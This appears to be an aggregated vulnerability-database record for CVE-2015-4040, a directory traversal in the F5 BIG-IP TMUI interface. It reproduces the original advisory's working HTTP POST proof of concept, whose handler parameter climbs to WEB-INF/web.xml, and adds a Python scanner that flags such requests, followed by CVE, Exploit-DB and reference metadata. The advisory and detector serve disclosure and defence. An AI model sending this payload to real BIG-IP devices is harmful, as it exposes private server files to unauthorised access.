vendor: | f5 | model: | big-ip pem | scope: | ne | version: | 12.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | ne | version: | 12.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | ne | version: | 12.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | ne | version: | 12.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | ne | version: | 12.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip afm | scope: | ne | version: | 12.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip aam | scope: | ne | version: | 12.0 | Trust: 0.3 |
EXPLOIT
# Exploit Title: [F5 BigIP File Path Traversal Vulnerability]
# Discovered by: Karn Ganeshen
# Reported on: April 27, 2015
# New version released on: September 01, 2015
# Vendor Homepage: [www.f5.com]
# Version Reported: [F5 BIG-IP 10.2.4 Build 595.0 Hotfix HF3]
# CVE-2015-4040 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4040]
# Multiple additional F5 products & versions are affected and documented here:
# https://support.f5.com/kb/en-us/solutions/public/17000/200/sol17253.html
*Vulnerability Details*
The handler parameter is vulnerable to file path manipulation attacks. When we submit a payload */tmui/locallb/virtual_server/../../../../WEB-INF/web.xml* in the *handler* parameter, the file *WEB-INF/web.xml* is returned.
*PoC:*
POST /tmui/Control/form HTTP/1.1
Host: <IP>
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://<IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp?&FilterBy=status_availability&Filter=2
Content-Type: application/x-www-form-urlencoded
Content-Length: 1004
Cookie: JSESSIONID=3211A73547444840255BAF39984E7E3F; BIGIPAuthUsernameCookie=admin; BIGIPAuthCookie=9B1099DD8A936DDBD58606DA3B5BABC7E82C43A5; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/locallb/virtual_server/list.jsp?&"; f5_refreshpage="https%3A//<IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp"; f5currenttab="main"; f5mainmenuopenlist=""; f5advanceddisplay=""
_timenow=Fri+Apr+24+14%3a48%3a38+EST+2015&_bufvalue_before=6hU2%2fMbRfPe7OHQ7VVc7TEffOpg%3d&exit_page=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&search_input=*&search_button_before=Search&_timeno
*...[SNIP]...*
fore=&enableObjList_before=&exit_page_before=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&row_count=0&_bufvalue_validation=NO_VALIDATION&disable_before=Disable&exit_button_before=Create...&handler=
*%2ftmui%2flocallb%2fvirtual_server%2f..%2f..%2f..%2f..%2fWEB-INF%2fweb.xml*
*Web.xml is returned in the Response:*
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE web-app
PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN"
"http://java.sun.com/j2ee/dtds/web-app_2_2.dtd">
*<!--Automatically created by Tomcat JspC.--><web-app>*
*...[config file output redacted here]...*
*.....*
Trust: 1.0
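A defender-side check for the handler behaviour described above, as an added example that is not part of the original advisory or of F5's code: it parses form bodies posted to /tmui/Control/form, decodes the handler value, and flags values that normalise outside /tmui/ or into WEB-INF. The /tmui/ prefix rule, the record layout, the source addresses and the benign handler value are assumptions constructed for the illustration.

```python
import posixpath
from urllib.parse import parse_qs, unquote

FORM_ENDPOINT = "/tmui/Control/form"      # endpoint shown in the PoC request
ALLOWED_PREFIX = "/tmui/"                 # assumption: legitimate handlers stay under /tmui/
PROTECTED_DIRS = {"web-inf", "meta-inf"}  # servlet-container private directories


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so nested encodings of '/' and '.' are exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def check_handler(value):
    """Return (reasons, normalized_path) for one form-decoded handler value.

    An empty reasons list means the value stays inside ALLOWED_PREFIX.
    """
    value = fully_decode(value).replace("\\", "/")
    # normpath collapses "a/../b" and drops ".." that would climb above "/"
    normalized = posixpath.normpath(value)
    reasons = []
    if ".." in value.split("/"):
        reasons.append("dot-dot segment")
    if not (normalized + "/").startswith(ALLOWED_PREFIX):
        reasons.append("resolves outside " + ALLOWED_PREFIX)
    if PROTECTED_DIRS & {seg.lower() for seg in normalized.split("/")}:
        reasons.append("targets protected directory")
    return reasons, normalized


def scan_requests(records):
    """Flag POSTs to the form endpoint whose handler parameter fails check_handler."""
    findings = []
    for rec in records:
        if rec["method"] != "POST" or rec["path"] != FORM_ENDPOINT:
            continue
        # parse_qs performs the first round of form decoding (%2f -> /)
        for value in parse_qs(rec["body"]).get("handler", []):
            reasons, normalized = check_handler(value)
            if reasons:
                findings.append({"src": rec["src"],
                                 "resolved": normalized,
                                 "reasons": reasons})
    return findings


# Constructed sample records (not captured traffic). The second body carries
# the handler value quoted in the advisory; the first is an assumed benign value.
SAMPLE_RECORDS = [
    {"src": "192.0.2.10", "method": "POST", "path": FORM_ENDPOINT,
     "body": "search_input=*&row_count=0"
             "&handler=%2ftmui%2flocallb%2fvirtual_server%2flist"},
    {"src": "192.0.2.77", "method": "POST", "path": FORM_ENDPOINT,
     "body": "search_input=*&row_count=0"
             "&handler=%2ftmui%2flocallb%2fvirtual_server"
             "%2f..%2f..%2f..%2f..%2fWEB-INF%2fweb.xml"},
    {"src": "192.0.2.10", "method": "GET",
     "path": "/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp",
     "body": ""},
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_RECORDS):
        print(finding)
```

The same `check_handler` logic can serve as an allow-list validation in front of the management interface, since it decides on the normalised path rather than on the raw string.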
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Directory Traversal
Trust: 1.0
TAGS
tag: | exploit | Trust: 0.5 |
tag: | file inclusion | Trust: 0.5 |
CREDITS
Karn Ganeshen
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2015-4040 | Trust: 3.0 |
db: | EXPLOIT-DB | id: | 38448 | Trust: 1.6 |
db: | EDBNET | id: | 81592 | Trust: 0.6 |
db: | EDBNET | id: | 59547 | Trust: 0.6 |
db: | PACKETSTORM | id: | 133931 | Trust: 0.5 |
db: | BID | id: | 77076 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2015-4040 | Trust: 2.1 |
url: | https://www.intelligentexploit.com | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/38448/ | Trust: 0.6 |
url: | https://f5.com/ | Trust: 0.3 |
url: | https://support.f5.com/kb/en-us/solutions/public/17000/200/sol17253.html | Trust: 0.3 |
SOURCES
db: | BID | id: | 77076 |
db: | PACKETSTORM | id: | 133931 |
db: | EXPLOIT-DB | id: | 38448 |
db: | EDBNET | id: | 81592 |
db: | EDBNET | id: | 59547 |
LAST UPDATE DATE
2022-07-27T09:15:27.148000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 77076 | date: | 2015-09-09T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 77076 | date: | 2015-09-09T00:00:00 |
db: | PACKETSTORM | id: | 133931 | date: | 2015-10-12T17:02:22 |
db: | EXPLOIT-DB | id: | 38448 | date: | 2015-10-13T00:00:00 |
db: | EDBNET | id: | 81592 | date: | 2015-10-13T00:00:00 |
db: | EDBNET | id: | 59547 | date: | 2015-10-13T00:00:00 |